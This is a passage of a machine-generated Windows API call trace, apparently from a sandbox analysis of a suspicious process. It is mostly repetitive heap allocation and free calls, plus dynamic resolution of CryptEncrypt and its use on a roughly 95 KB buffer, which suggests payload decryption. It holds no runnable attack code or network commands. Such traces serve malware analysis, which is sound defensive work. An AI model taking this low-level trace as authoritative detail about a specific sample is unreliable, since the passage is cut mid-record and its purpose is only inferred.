lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0259.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa880, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.057] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0259.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0259.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0259.058] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x173f7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x173f8) returned 1 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0259.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0259.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0259.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0259.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0259.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0259.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0259.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0259.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0259.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0259.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0259.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0259.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0259.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0259.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0259.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0259.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0259.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0259.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0259.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0259.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0259.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0259.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0259.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0259.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0259.061] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0259.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0259.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0259.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0259.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0259.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0259.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0259.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0259.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.063] CharLowerBuffW (in: lpsz="byte[95224]", cchLength=0xb | out: lpsz="byte[95224]") returned 0xb [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0259.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0259.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0259.065] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0259.066] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0259.066] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0259.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0259.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0259.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0259.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.067] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c9650*, pdwDataLen=0x8bef68*=0x173f7, dwBufLen=0x173f8 | out: pbData=0x34c9650*, pdwDataLen=0x8bef68*=0x173f8) returned 1 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0259.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0259.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0259.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0259.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0259.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0259.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0259.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0259.072] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0259.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 